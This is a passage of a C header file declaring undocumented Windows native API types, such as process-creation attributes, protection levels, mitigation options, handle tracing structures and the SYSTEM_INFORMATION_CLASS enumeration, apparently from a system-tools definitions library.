*PPROCESS_ACCESS_TOKEN;\n\ntypedef struct _PROCESS_HANDLE_TABLE_ENTRY_INFO {\n    HANDLE HandleValue;\n    ULONG_PTR HandleCount;\n    ULONG_PTR PointerCount;\n    ULONG GrantedAccess;\n    ULONG ObjectTypeIndex;\n    ULONG HandleAttributes;\n    ULONG Reserved;\n} PROCESS_HANDLE_TABLE_ENTRY_INFO, *PPROCESS_HANDLE_TABLE_ENTRY_INFO;\n\ntypedef struct _PROCESS_HANDLE_SNAPSHOT_INFORMATION {\n    ULONG_PTR NumberOfHandles;\n    ULONG_PTR Reserved;\n    PROCESS_HANDLE_TABLE_ENTRY_INFO Handles[1];\n} PROCESS_HANDLE_SNAPSHOT_INFORMATION, *PPROCESS_HANDLE_SNAPSHOT_INFORMATION;\n\ntypedef enum _PROCESS_STATE_CHANGE_TYPE {\n    
ProcessStateChangeSuspend,\n    ProcessStateChangeResume,\n    ProcessStateChangeMax,\n} PROCESS_STATE_CHANGE_TYPE, *PPROCESS_STATE_CHANGE_TYPE;\n\ntypedef enum _THREAD_STATE_CHANGE_TYPE {\n    ThreadStateChangeSuspend,\n    ThreadStateChangeResume,\n    ThreadStateChangeMax,\n} THREAD_STATE_CHANGE_TYPE, *PTHREAD_STATE_CHANGE_TYPE;\n\n//\n// Process/Thread System and User Time\n//  NtQueryInformationProcess using ProcessTimes\n//  NtQueryInformationThread using ThreadTimes\n//\ntypedef struct _KERNEL_USER_TIMES {\n    LARGE_INTEGER CreateTime;\n    LARGE_INTEGER ExitTime;\n    LARGE_INTEGER KernelTime;\n    LARGE_INTEGER UserTime;\n} KERNEL_USER_TIMES, *PKERNEL_USER_TIMES;\n\ntypedef enum _PS_MITIGATION_OPTION {\n    PS_MITIGATION_OPTION_NX,\n    PS_MITIGATION_OPTION_SEHOP,\n    PS_MITIGATION_OPTION_FORCE_RELOCATE_IMAGES,\n    PS_MITIGATION_OPTION_HEAP_TERMINATE,\n    PS_MITIGATION_OPTION_BOTTOM_UP_ASLR,\n    PS_MITIGATION_OPTION_HIGH_ENTROPY_ASLR,\n    PS_MITIGATION_OPTION_STRICT_HANDLE_CHECKS,\n    PS_MITIGATION_OPTION_WIN32K_SYSTEM_CALL_DISABLE,\n    PS_MITIGATION_OPTION_EXTENSION_POINT_DISABLE,\n    PS_MITIGATION_OPTION_PROHIBIT_DYNAMIC_CODE,\n    PS_MITIGATION_OPTION_CONTROL_FLOW_GUARD,\n    PS_MITIGATION_OPTION_BLOCK_NON_MICROSOFT_BINARIES,\n    PS_MITIGATION_OPTION_FONT_DISABLE,\n    PS_MITIGATION_OPTION_IMAGE_LOAD_NO_REMOTE,\n    PS_MITIGATION_OPTION_IMAGE_LOAD_NO_LOW_LABEL,\n    PS_MITIGATION_OPTION_IMAGE_LOAD_PREFER_SYSTEM32,\n    PS_MITIGATION_OPTION_RETURN_FLOW_GUARD,\n    PS_MITIGATION_OPTION_LOADER_INTEGRITY_CONTINUITY,\n    PS_MITIGATION_OPTION_STRICT_CONTROL_FLOW_GUARD,\n    PS_MITIGATION_OPTION_RESTRICT_SET_THREAD_CONTEXT,\n    PS_MITIGATION_OPTION_ROP_STACKPIVOT,\n    PS_MITIGATION_OPTION_ROP_CALLER_CHECK,\n    PS_MITIGATION_OPTION_ROP_SIMEXEC,\n    PS_MITIGATION_OPTION_EXPORT_ADDRESS_FILTER,\n    PS_MITIGATION_OPTION_EXPORT_ADDRESS_FILTER_PLUS,\n    PS_MITIGATION_OPTION_RESTRICT_CHILD_PROCESS_CREATION,\n    
PS_MITIGATION_OPTION_IMPORT_ADDRESS_FILTER,\n    PS_MITIGATION_OPTION_MODULE_TAMPERING_PROTECTION,\n    PS_MITIGATION_OPTION_RESTRICT_INDIRECT_BRANCH_PREDICTION,\n    PS_MITIGATION_OPTION_SPECULATIVE_STORE_BYPASS_DISABLE,\n    PS_MITIGATION_OPTION_ALLOW_DOWNGRADE_DYNAMIC_CODE_POLICY,\n    PS_MITIGATION_OPTION_CET_SHADOW_STACKS,\n    PS_MITIGATION_OPTION_USER_CET_SET_CONTEXT_IP_VALIDATION,\n    PS_MITIGATION_OPTION_BLOCK_NON_CET_BINARIES,\n    PS_MITIGATION_OPTION_CET_DYNAMIC_APIS_OUT_OF_PROC_ONLY,\n    PS_MITIGATION_OPTION_REDIRECTION_TRUST,\n    PS_MITIGATION_OPTION_RESTRICT_CORE_SHARING,\n    PS_MITIGATION_OPTION_FSCTL_SYSTEM_CALL_DISABLE\n} PS_MITIGATION_OPTION;\n\ntypedef enum _PS_CREATE_STATE {\n    PsCreateInitialState,\n    PsCreateFailOnFileOpen,\n    PsCreateFailOnSectionCreate,\n    PsCreateFailExeFormat,\n    PsCreateFailMachineMismatch,\n    PsCreateFailExeName,\n    PsCreateSuccess,\n    PsCreateMaximumStates\n} PS_CREATE_STATE;\n\ntypedef struct _PS_CREATE_INFO {\n    SIZE_T Size;\n    PS_CREATE_STATE State;\n    union\n    {\n        struct\n        {\n            union\n            {\n                ULONG InitFlags;\n                struct\n                {\n                    UCHAR WriteOutputOnExit : 1;\n                    UCHAR DetectManifest : 1;\n                    UCHAR IFEOSkipDebugger : 1;\n                    UCHAR IFEODoNotPropagateKeyState : 1;\n                    UCHAR SpareBits1 : 4;\n                    UCHAR SpareBits2 : 8;\n                    USHORT ProhibitedImageCharacteristics : 16;\n                };\n            };\n            ACCESS_MASK AdditionalFileAccess;\n        } InitState;\n\n        struct\n        {\n            HANDLE FileHandle;\n        } FailSection;\n\n        struct\n        {\n            USHORT DllCharacteristics;\n        } ExeFormat;\n\n        struct\n        {\n            HANDLE IFEOKey;\n        } ExeName;\n\n        struct\n        {\n            union\n            {\n                ULONG 
OutputFlags;\n                struct\n                {\n                    UCHAR ProtectedProcess : 1;\n                    UCHAR AddressSpaceOverride : 1;\n                    UCHAR DevOverrideEnabled : 1;\n                    UCHAR ManifestDetected : 1;\n                    UCHAR ProtectedProcessLight : 1;\n                    UCHAR SpareBits1 : 3;\n                    UCHAR SpareBits2 : 8;\n                    USHORT SpareBits3 : 16;\n                };\n            };\n            HANDLE FileHandle;\n            HANDLE SectionHandle;\n            ULONGLONG UserProcessParametersNative;\n            ULONG UserProcessParametersWow64;\n            ULONG CurrentParameterFlags;\n            ULONGLONG PebAddressNative;\n            ULONG PebAddressWow64;\n            ULONGLONG ManifestAddress;\n            ULONG ManifestSize;\n        } SuccessState;\n    };\n} PS_CREATE_INFO, *PPS_CREATE_INFO;\n\ntypedef struct _PS_ATTRIBUTE {\n    ULONG Attribute;\n    SIZE_T Size;\n    union\n    {\n        ULONG Value;\n        PVOID ValuePtr;\n    };\n    PSIZE_T ReturnLength;\n} PS_ATTRIBUTE, *PPS_ATTRIBUTE;\n\ntypedef struct _PS_ATTRIBUTE_LIST {\n    SIZE_T TotalLength;\n    PS_ATTRIBUTE Attributes[1];\n} PS_ATTRIBUTE_LIST, *PPS_ATTRIBUTE_LIST;\n\ntypedef enum _PS_PROTECTED_TYPE {\n    PsProtectedTypeNone,\n    PsProtectedTypeProtectedLight,\n    PsProtectedTypeProtected,\n    PsProtectedTypeMax\n} PS_PROTECTED_TYPE;\n\ntypedef enum _PS_PROTECTED_SIGNER {\n    PsProtectedSignerNone,\n    PsProtectedSignerAuthenticode,\n    PsProtectedSignerCodeGen,\n    PsProtectedSignerAntimalware,\n    PsProtectedSignerLsa,\n    PsProtectedSignerWindows,\n    PsProtectedSignerWinTcb,\n    PsProtectedSignerWinSystem,\n    PsProtectedSignerApp,\n    PsProtectedSignerMax\n} PS_PROTECTED_SIGNER;\n\n#define PS_PROTECTED_SIGNER_MASK 0xFF\n#define PS_PROTECTED_AUDIT_MASK 0x08\n#define PS_PROTECTED_TYPE_MASK 0x07\n\n// from ph2\n#define PsProtectedValue(aSigner, aAudit, aType) ( \\\n    (((aSigner) 
& PS_PROTECTED_SIGNER_MASK) << 4) | \\\n    (((aAudit) & PS_PROTECTED_AUDIT_MASK) << 3) | \\\n    ((aType) & PS_PROTECTED_TYPE_MASK)\\\n    )\n\n#define InitializePsProtection(aProtectionLevelPtr, aSigner, aAudit, aType) { \\\n    (aProtectionLevelPtr)->Signer = aSigner; \\\n    (aProtectionLevelPtr)->Audit = aAudit; \\\n    (aProtectionLevelPtr)->Type = aType; \\\n    }\n\ntypedef struct _PS_PROTECTION {\n    union\n    {\n        UCHAR Level;\n        struct\n        {\n            UCHAR Type : 3;\n            UCHAR Audit : 1;\n            UCHAR Signer : 4;\n        };\n    };\n} PS_PROTECTION, *PPS_PROTECTION;\n\n// begin_rev\n#define PS_ATTRIBUTE_NUMBER_MASK 0x0000ffff\n#define PS_ATTRIBUTE_THREAD 0x00010000 \n#define PS_ATTRIBUTE_INPUT 0x00020000 \n#define PS_ATTRIBUTE_ADDITIVE 0x00040000 \n// end_rev\n\ntypedef enum _PS_ATTRIBUTE_NUM {\n    PsAttributeParentProcess,\n    PsAttributeDebugPort,\n    PsAttributeToken,\n    PsAttributeClientId,\n    PsAttributeTebAddress,\n    PsAttributeImageName,\n    PsAttributeImageInfo,\n    PsAttributeMemoryReserve,\n    PsAttributePriorityClass,\n    PsAttributeErrorMode,\n    PsAttributeStdHandleInfo,\n    PsAttributeHandleList,\n    PsAttributeGroupAffinity,\n    PsAttributePreferredNode,\n    PsAttributeIdealProcessor,\n    PsAttributeUmsThread,\n    PsAttributeMitigationOptions,\n    PsAttributeProtectionLevel,\n    PsAttributeSecureProcess,\n    PsAttributeJobList,\n    PsAttributeChildProcessPolicy,\n    PsAttributeAllApplicationPackagesPolicy,\n    PsAttributeWin32kFilter,\n    PsAttributeSafeOpenPromptOriginClaim,\n    PsAttributeBnoIsolation,\n    PsAttributeDesktopAppPolicy,\n    PsAttributeChpe,\n    PsAttributeMitigationAuditOptions,\n    PsAttributeMachineType,\n    PsAttributeComponentFilter,\n    PsAttributeEnableOptionalXStateFeatures,\n    PsAttributeSupportedMachines,\n    PsAttributeSveVectorLength,\n    PsAttributeMax\n} PS_ATTRIBUTE_NUM;\n\n#define PsAttributeValue(Number, Thread, Input, Unknown) \\\n  
  (((Number) & PS_ATTRIBUTE_NUMBER_MASK) | \\\n    ((Thread) ? PS_ATTRIBUTE_THREAD : 0) | \\\n    ((Input) ? PS_ATTRIBUTE_INPUT : 0) | \\\n    ((Unknown) ? PS_ATTRIBUTE_ADDITIVE : 0))\n\n#define PS_ATTRIBUTE_PARENT_PROCESS \\\n    PsAttributeValue(PsAttributeParentProcess, FALSE, TRUE, TRUE)\n#define PS_ATTRIBUTE_DEBUG_OBJECT \\\n    PsAttributeValue(PsAttributeDebugPort, FALSE, TRUE, TRUE)\n#define PS_ATTRIBUTE_TOKEN \\\n    PsAttributeValue(PsAttributeToken, FALSE, TRUE, TRUE)\n#define PS_ATTRIBUTE_CLIENT_ID \\\n    PsAttributeValue(PsAttributeClientId, TRUE, FALSE, FALSE)\n#define PS_ATTRIBUTE_TEB_ADDRESS \\\n    PsAttributeValue(PsAttributeTebAddress, TRUE, FALSE, FALSE)\n#define PS_ATTRIBUTE_IMAGE_NAME \\\n    PsAttributeValue(PsAttributeImageName, FALSE, TRUE, FALSE)\n#define PS_ATTRIBUTE_IMAGE_INFO \\\n    PsAttributeValue(PsAttributeImageInfo, FALSE, FALSE, FALSE)\n#define PS_ATTRIBUTE_MEMORY_RESERVE \\\n    PsAttributeValue(PsAttributeMemoryReserve, FALSE, TRUE, FALSE)\n#define PS_ATTRIBUTE_PRIORITY_CLASS \\\n    PsAttributeValue(PsAttributePriorityClass, FALSE, TRUE, FALSE)\n#define PS_ATTRIBUTE_ERROR_MODE \\\n    PsAttributeValue(PsAttributeErrorMode, FALSE, TRUE, FALSE)\n#define PS_ATTRIBUTE_STD_HANDLE_INFO \\\n    PsAttributeValue(PsAttributeStdHandleInfo, FALSE, TRUE, FALSE)\n#define PS_ATTRIBUTE_HANDLE_LIST \\\n    PsAttributeValue(PsAttributeHandleList, FALSE, TRUE, FALSE)\n#define PS_ATTRIBUTE_GROUP_AFFINITY \\\n    PsAttributeValue(PsAttributeGroupAffinity, TRUE, TRUE, FALSE)\n#define PS_ATTRIBUTE_PREFERRED_NODE \\\n    PsAttributeValue(PsAttributePreferredNode, FALSE, TRUE, FALSE)\n#define PS_ATTRIBUTE_IDEAL_PROCESSOR \\\n    PsAttributeValue(PsAttributeIdealProcessor, TRUE, TRUE, FALSE)\n#define PS_ATTRIBUTE_UMS_THREAD \\\n    PsAttributeValue(PsAttributeUmsThread, TRUE, TRUE, FALSE)\n#define PS_ATTRIBUTE_MITIGATION_OPTIONS \\\n    PsAttributeValue(PsAttributeMitigationOptions, FALSE, TRUE, FALSE)\n#define PS_ATTRIBUTE_PROTECTION_LEVEL \\\n    
PsAttributeValue(PsAttributeProtectionLevel, FALSE, TRUE, TRUE)\n#define PS_ATTRIBUTE_SECURE_PROCESS \\\n    PsAttributeValue(PsAttributeSecureProcess, FALSE, TRUE, FALSE)\n#define PS_ATTRIBUTE_JOB_LIST \\\n    PsAttributeValue(PsAttributeJobList, FALSE, TRUE, FALSE)\n#define PS_ATTRIBUTE_CHILD_PROCESS_POLICY \\\n    PsAttributeValue(PsAttributeChildProcessPolicy, FALSE, TRUE, FALSE)\n#define PS_ATTRIBUTE_ALL_APPLICATION_PACKAGES_POLICY \\\n    PsAttributeValue(PsAttributeAllApplicationPackagesPolicy, FALSE, TRUE, FALSE)\n#define PS_ATTRIBUTE_WIN32K_FILTER \\\n    PsAttributeValue(PsAttributeWin32kFilter, FALSE, TRUE, FALSE)\n#define PS_ATTRIBUTE_SAFE_OPEN_PROMPT_ORIGIN_CLAIM \\\n    PsAttributeValue(PsAttributeSafeOpenPromptOriginClaim, FALSE, TRUE, FALSE)\n#define PS_ATTRIBUTE_BNO_ISOLATION \\\n    PsAttributeValue(PsAttributeBnoIsolation, FALSE, TRUE, FALSE)\n#define PS_ATTRIBUTE_DESKTOP_APP_POLICY \\\n    PsAttributeValue(PsAttributeDesktopAppPolicy, FALSE, TRUE, FALSE)\n#define PS_ATTRIBUTE_CHPE \\\n    PsAttributeValue(PsAttributeChpe, FALSE, TRUE, TRUE)\n#define PS_ATTRIBUTE_MITIGATION_AUDIT_OPTIONS \\\n    PsAttributeValue(PsAttributeMitigationAuditOptions, FALSE, TRUE, FALSE)\n#define PS_ATTRIBUTE_MACHINE_TYPE \\\n    PsAttributeValue(PsAttributeMachineType, FALSE, TRUE, TRUE)\n#define PS_ATTRIBUTE_COMPONENT_FILTER \\\n    PsAttributeValue(PsAttributeComponentFilter, FALSE, TRUE, FALSE)\n#define PS_ATTRIBUTE_ENABLE_OPTIONAL_XSTATE_FEATURES \\\n    PsAttributeValue(PsAttributeEnableOptionalXStateFeatures, TRUE, TRUE, FALSE)\n\n#define RTL_USER_PROC_PARAMS_NORMALIZED                 0x00000001\n#define RTL_USER_PROC_PROFILE_USER                      0x00000002\n#define RTL_USER_PROC_PROFILE_KERNEL                    0x00000004\n#define RTL_USER_PROC_PROFILE_SERVER                    0x00000008\n#define RTL_USER_PROC_RESERVE_1MB                       0x00000020\n#define RTL_USER_PROC_RESERVE_16MB                      0x00000040\n#define 
RTL_USER_PROC_CASE_SENSITIVE                    0x00000080\n#define RTL_USER_PROC_DISABLE_HEAP_DECOMMIT             0x00000100\n#define RTL_USER_PROC_DLL_REDIRECTION_LOCAL             0x00001000\n#define RTL_USER_PROC_APP_MANIFEST_PRESENT              0x00002000\n#define RTL_USER_PROC_IMAGE_KEY_MISSING                 0x00004000\n#define RTL_USER_PROC_DEV_OVERRIDE_ENABLED              0x00008000\n#define RTL_USER_PROC_OPTIN_PROCESS                     0x00020000\n#define RTL_USER_PROC_SESSION_OWNER                     0x00040000\n#define RTL_USER_PROC_HANDLE_USER_CALLBACK_EXCEPTIONS   0x00080000\n#define RTL_USER_PROC_PROTECTED_PROCESS                 0x00400000\n#define RTL_USER_PROC_SECURE_PROCESS                    0x80000000\n\ntypedef struct _PROCESS_HANDLE_TRACING_ENABLE {\n    ULONG Flags;\n} PROCESS_HANDLE_TRACING_ENABLE, * PPROCESS_HANDLE_TRACING_ENABLE;\n\n#define PROCESS_HANDLE_TRACING_MAX_SLOTS 0x20000\n\ntypedef struct _PROCESS_HANDLE_TRACING_ENABLE_EX {\n    ULONG Flags;\n    ULONG TotalSlots;\n} PROCESS_HANDLE_TRACING_ENABLE_EX, * PPROCESS_HANDLE_TRACING_ENABLE_EX;\n\n#define PROCESS_HANDLE_TRACING_MAX_STACKS 16\n\n#define PROCESS_HANDLE_TRACE_TYPE_OPEN      1\n#define PROCESS_HANDLE_TRACE_TYPE_CLOSE     2\n#define PROCESS_HANDLE_TRACE_TYPE_BADREF    3\n\ntypedef struct _PROCESS_HANDLE_TRACING_ENTRY {\n    HANDLE Handle;\n    CLIENT_ID ClientId;\n    ULONG Type;\n    PVOID Stacks[PROCESS_HANDLE_TRACING_MAX_STACKS];\n} PROCESS_HANDLE_TRACING_ENTRY, * PPROCESS_HANDLE_TRACING_ENTRY;\n\ntypedef struct _PROCESS_HANDLE_TRACING_QUERY {\n    HANDLE Handle;\n    ULONG TotalTraces;\n    PROCESS_HANDLE_TRACING_ENTRY HandleTrace[1];\n} PROCESS_HANDLE_TRACING_QUERY, * PPROCESS_HANDLE_TRACING_QUERY;\n\ntypedef struct _PROCESS_WS_WATCH_INFORMATION {\n    PVOID FaultingPc;\n    PVOID FaultingVa;\n} PROCESS_WS_WATCH_INFORMATION, * PPROCESS_WS_WATCH_INFORMATION;\n\ntypedef struct _PROCESS_WS_WATCH_INFORMATION_EX {\n    PROCESS_WS_WATCH_INFORMATION BasicInfo;\n    
ULONG_PTR FaultingThreadId;\n    ULONG_PTR Flags;\n} PROCESS_WS_WATCH_INFORMATION_EX, * PPROCESS_WS_WATCH_INFORMATION_EX;\n\ntypedef struct _PROCESS_INSTRUMENTATION_CALLBACK_INFORMATION {\n    ULONG Version;\n    ULONG Reserved;\n    PVOID Callback;\n} PROCESS_INSTRUMENTATION_CALLBACK_INFORMATION, * PPROCESS_INSTRUMENTATION_CALLBACK_INFORMATION;\n\n/*\n** Processes END\n*/\n\ntypedef enum _SYSTEM_INFORMATION_CLASS {\n    SystemBasicInformation = 0,\n    SystemProcessorInformation = 1,\n    SystemPerformanceInformation = 2,\n    SystemTimeOfDayInformation = 3,\n    SystemPathInformation = 4,\n    SystemProcessInformation = 5,\n    SystemCallCountInformation = 6,\n    SystemDeviceInformation = 7,\n    SystemProcessorPerformanceInformation = 8,\n    SystemFlagsInformation = 9,\n    SystemCallTimeInformation = 10,\n    SystemModuleInformation = 11,\n    SystemLocksInformation = 12,\n    SystemStackTraceInformation = 13,\n    SystemPagedPoolInformation = 14,\n    SystemNonPagedPoolInformation = 15,\n    SystemHandleInformation = 16,\n    SystemObjectInformation = 17,\n    SystemPageFileInformation = 18,\n    SystemVdmInstemulInformation = 19,\n    SystemVdmBopInformation = 20,\n    SystemFileCacheInformation = 21,\n    SystemPoolTagInformation = 22,\n    SystemInterruptInformation = 23,\n    SystemDpcBehaviorInformation = 24,\n    SystemFullMemoryInformation = 25,\n    SystemLoadGdiDriverInformation = 26,\n    SystemUnloadGdiDriverInformation = 27,\n    SystemTimeAdjustmentInformation = 28,\n    SystemSummaryMemoryInformation = 29,\n    SystemMirrorMemoryInformation = 30,\n    SystemPerformanceTraceInformation = 31,\n    SystemObsolete0 = 32,\n    SystemExceptionInformation = 33,\n    SystemCrashDumpStateInformation = 34,\n    SystemKernelDebuggerInformation = 35,\n    SystemContextSwitchInformation = 36,\n    SystemRegistryQuotaInformation = 37,\n    SystemExtendServiceTableInformation = 38,\n    SystemPrioritySeperation = 39,\n    SystemVerifierAddDriverInformation = 
40,\n    SystemVerifierRemoveDriverInformation = 41,\n    SystemProcessorIdleInformation = 42,\n    SystemLegacyDriverInformation = 43,\n    SystemCurrentTimeZoneInformation = 44,\n    SystemLookasideInformation = 45,\n    SystemTimeSlipNotification = 46,\n    SystemSessionCreate = 47,\n    SystemSessionDetach = 48,\n    SystemSessionInformation = 49,\n    SystemRangeStartInformation = 50,\n    SystemVerifierInformation = 51,\n    SystemVerifierThunkExtend = 52,\n    SystemSessionProcessInformation = 53,\n    SystemLoadGdiDriverInSystemSpace = 54,\n    SystemNumaProcessorMap = 55,\n    SystemPrefetcherInformation = 56,\n    SystemExtendedProcessInformation = 57,\n    SystemRecommendedSharedDataAlignment = 58,\n    SystemComPlusPackage = 59,\n    SystemNumaAvailableMemory = 60,\n    SystemProcessorPowerInformation = 61,\n    SystemEmulationBasicInformation = 62,\n    SystemEmulationProcessorInformation = 63,\n    SystemExtendedHandleInformation = 64,\n    SystemLostDelayedWriteInformation = 65,\n    SystemBigPoolInformation = 66,\n    SystemSessionPoolTagInformation = 67,\n    SystemSessionMappedViewInformation = 68,\n    SystemHotpatchInformation = 69,\n    SystemObjectSecurityMode = 70,\n    SystemWatchdogTimerHandler = 71,\n    SystemWatchdogTimerInformation = 72,\n    SystemLogicalProcessorInformation = 73,\n    SystemWow64SharedInformationObsolete = 74,\n    SystemRegisterFirmwareTableInformationHandler = 75,\n    SystemFirmwareTableInformation = 76,\n    SystemModuleInformationEx = 77,\n    SystemVerifierTriageInformation = 78,\n    SystemSuperfetchInformation = 79,\n    SystemMemoryListInformation = 80,\n    SystemFileCacheInformationEx = 81,\n    SystemThreadPriorityClientIdInformation = 82,\n    SystemProcessorIdleCycleTimeInformation = 83,\n    SystemVerifierCancellationInformation = 84,\n    SystemProcessorPowerInformationEx = 85,\n    SystemRefTraceInformation = 86,\n    SystemSpecialPoolInformation = 87,\n    SystemProcessIdInformation = 88,\n    
SystemErrorPortInformation = 89,\n    SystemBootEnvironmentInformation = 90,\n    SystemHypervisorInformation = 91,\n    SystemVerifierInformationEx = 92,\n    SystemTimeZoneInformation = 93,\n    SystemImageFileExecutionOptionsInformation = 94,\n    SystemCoverageInformation = 95,\n    SystemPrefetchPatchInformation = 96,\n    SystemVerifierFaultsInformation = 97,\n    SystemSystemPartitionInformation = 98,\n    SystemSystemDiskInformation = 99,\n    SystemProcessorPerformanceDistribution = 100,\n    SystemNumaProximityNodeInformation = 101,\n    SystemDynamicTimeZoneInformation = 102,\n    SystemCodeIntegrityInformation = 103,\n    SystemProcessorMicrocodeUpdateInformation = 104,\n    SystemProcessorBrandString = 105,\n    SystemVirtualAddressInformation = 106,\n    SystemLogicalProcessorAndGroupInformation = 107,\n    SystemProcessorCycleTimeInformation = 108,\n    SystemStoreInformation = 109,\n    SystemRegistryAppendString = 110,\n    SystemAitSamplingValue = 111,\n    SystemVhdBootInformation = 112,\n    SystemCpuQuotaInformation = 113,\n    SystemNativeBasicInformation = 114,\n    SystemErrorPortTimeouts = 115,\n    SystemLowPriorityIoInformation = 116,\n    SystemBootEntropyInformation = 117,\n    SystemVerifierCountersInformation = 118,\n    SystemPagedPoolInformationEx = 119,\n    SystemSystemPtesInformationEx = 120,\n    SystemNodeDistanceInformation = 121,\n    SystemAcpiAuditInformation = 122,\n    SystemBasicPerformanceInformation = 123,\n    SystemQueryPerformanceCounterInformation = 124,\n    SystemSessionBigPoolInformation = 125,\n    SystemBootGraphicsInformation = 126,\n    SystemScrubPhysicalMemoryInformation = 127,\n    SystemBadPageInformation = 128,\n    SystemProcessorProfileControlArea = 129,\n    SystemCombinePhysicalMemoryInformation = 130,\n    SystemEntropyInterruptTimingInformation = 131,\n    SystemConsoleInformation = 132,\n    SystemPlatformBinaryInformation = 133,\n    SystemPolicyInformation = 134,\n    
SystemHypervisorProcessorCountInformation = 135,\n    SystemDeviceDataInformation = 136,\n    SystemDeviceDataEnumerationInformation = 137,\n    SystemMemoryTopologyInformation = 138,\n    SystemMemoryChannelInformation = 139,\n    SystemBootLogoInformation = 140,\n    SystemProcessorPerformanceInformationEx = 141,\n    SystemSpare0 = 142,\n    SystemSecureBootPolicyInformation = 143,\n    SystemPageFileInformationEx = 144,\n    SystemSecureBootInformation = 145,\n    SystemEntropyInterruptTimingRawInformation = 146,\n    SystemPortableWorkspaceEfiLauncherInformation = 147,\n    SystemFullProcessInformation = 148,\n    SystemKernelDebuggerInformationEx = 149,\n    SystemBootMetadataInformation = 150,\n    SystemSoftRebootInformation = 151,\n    SystemElamCertificateInformation = 152,\n    SystemOfflineDumpConfigInformation = 153,\n    SystemProcessorFeaturesInformation = 154,\n    SystemRegistryReconciliationInformation = 155,\n    SystemEdidInformation = 156,\n    SystemManufacturingInformation = 157,\n    SystemEnergyEstimationConfigInformation = 158,\n    SystemHypervisorDetailInformation = 159,\n    SystemProcessorCycleStatsInformation = 160,\n    SystemVmGenerationCountInformation = 161,\n    SystemTrustedPlatformModuleInformation = 162,\n    SystemKernelDebuggerFlags = 163,\n    SystemCodeIntegrityPolicyInformation = 164,\n    SystemIsolatedUserModeInformation = 165,\n    SystemHardwareSecurityTestInterfaceResultsInformation = 166,\n    SystemSingleModuleInformation = 167,\n    SystemAllowedCpuSetsInformation = 168,\n    SystemVsmProtectionInformation = 169, //ex SystemDmaProtectionInformation\n    SystemInterruptCpuSetsInformation = 170,\n    SystemSecureBootPolicyFullInformation = 171,\n    SystemCodeIntegrityPolicyFullInformation = 172,\n    SystemAffinitizedInterruptProcessorInformation = 173,\n    SystemRootSiloInformation = 174,\n    SystemCpuSetInformation = 175,\n    SystemCpuSetTagInformation = 176,\n    SystemWin32WerStartCallout = 177,\n    
SystemSecureKernelProfileInformation = 178,\n    SystemCodeIntegrityPlatformManifestInformation = 179,\n    SystemInterruptSteeringInformation = 180,\n    SystemSupportedProcessorArchitectures = 181,\n    SystemMemoryUsageInformation = 182,\n    SystemCodeIntegrityCertificateInformation = 183,\n    SystemPhysicalMemoryInformation = 184,\n    SystemControlFlowTransition = 185,\n    SystemKernelDebuggingAllowed = 186,\n    SystemActivityModerationExeState = 187,\n    SystemActivityModerationUserSettings = 188,\n    SystemCodeIntegrityPoliciesFullInformation = 189,\n    SystemCodeIntegrityUnlockInformation = 190,\n    SystemIntegrityQuotaInformation = 191,\n    SystemFlushInformation = 192,\n    SystemProcessorIdleMaskInformation = 193,\n    SystemSecureDumpEncryptionInformation = 194,\n    SystemWriteConstraintInformation = 195,\n    SystemKernelVaShadowInformation = 196,\n    SystemHypervisorSharedPageInformation = 197,\n    SystemFirmwareBootPerformanceInformation = 198,\n    SystemCodeIntegrityVerificationInformation = 199,\n    SystemFirmwarePartitionInformation = 200,\n    SystemSpeculationControlInformation = 201,\n    SystemDmaGuardPolicyInformation = 202,\n    SystemEnclaveLaunchControlInformation = 203,\n    SystemWorkloadAllowedCpuSetsInformation = 204,\n    SystemCodeIntegrityUnlockModeInformation = 205,\n    SystemLeapSecondInformation = 206,\n    SystemFlags2Information = 207,\n    SystemSecurityModelInformation = 208,\n    SystemCodeIntegritySyntheticCacheInformation = 209,\n    SystemFeatureConfigurationInformation = 210,\n    SystemFeatureConfigurationSectionInformation = 211,\n    SystemFeatureUsageSubscriptionInformation = 212,\n    SystemSecureSpeculationControlInformation = 213,\n    SystemSpacesBootInformation = 214,\n    SystemFwRamdiskInformation = 215,\n    SystemWheaIpmiHardwareInformation = 216,\n    SystemDifSetRuleClassInformation = 217,\n    SystemDifClearRuleClassInformation = 218,\n    SystemDifApplyPluginVerificationOnDriver = 219,\n   
 SystemDifRemovePluginVerificationOnDriver = 220,\n    SystemShadowStackInformation = 221,\n    SystemBuildVersionInformation = 222,\n    SystemPoolLimitInformation = 223,\n    SystemCodeIntegrityAddDynamicStore = 224,\n    SystemCodeIntegrityClearDynamicStores = 225,\n    SystemDifPoolTrackingInformation = 226,\n    SystemPoolZeroingInformation = 227,\n    SystemDpcWatchdogInformation = 228,\n    SystemDpcWatchdogInformation2 = 229,\n    SystemSupportedProcessorArchitectures2 = 230,\n    SystemSingleProcessorRelationshipInformation = 231,\n    SystemXfgCheckFailureInformation = 232,\n    SystemIommuStateInformation = 233,\n    SystemHypervisorMinrootInformation = 234,\n    SystemHypervisorBootPagesInformation = 235,\n    SystemPointerAuthInformation = 236,\n    SystemSecureKernelDebuggerInformation = 237,\n    SystemOriginalImageFeatureInformation = 238,\n    SystemMemoryNumaInformation = 239,\n    SystemMemoryNumaPerformanceInformation = 240,\n    SystemCodeIntegritySignedPoliciesFullInformation = 241,\n    SystemSecureSecretsInformation = 242,\n    SystemTrustedAppsRuntimeInformation = 243,\n    SystemBadPageInformationEx = 244,\n    SystemResourceDeadlockTimeout = 245,\n    SystemBreakOnContextUnwindFailureInformation = 246,\n    SystemOslRamdiskInformation = 247,\n    SystemCodeIntegrityPolicyManagementInformation = 248,\n    SystemMemoryNumaCacheInformation = 249,\n    SystemProcessorFeaturesBitMapInformation = 250,\n    SystemRefTraceInformationEx = 251,\n    SystemBasicProcessInformation = 252,\n    SystemHandleCountInformation = 253,\n    MaxSystemInfoClass\n} SYSTEM_INFORMATION_CLASS, * PSYSTEM_INFORMATION_CLASS;\n\ntypedef struct _SYSTEM_VSM_PROTECTION_INFORMATION {\n    CHAR DmaProtectionsAvailable;\n    CHAR DmaProtectionsInUse;\n    CHAR HardwareMbecAvailable;\n    CHAR ApicVirtualizationAvailable;\n} SYSTEM_VSM_PROTECTION_INFORMATION, * 
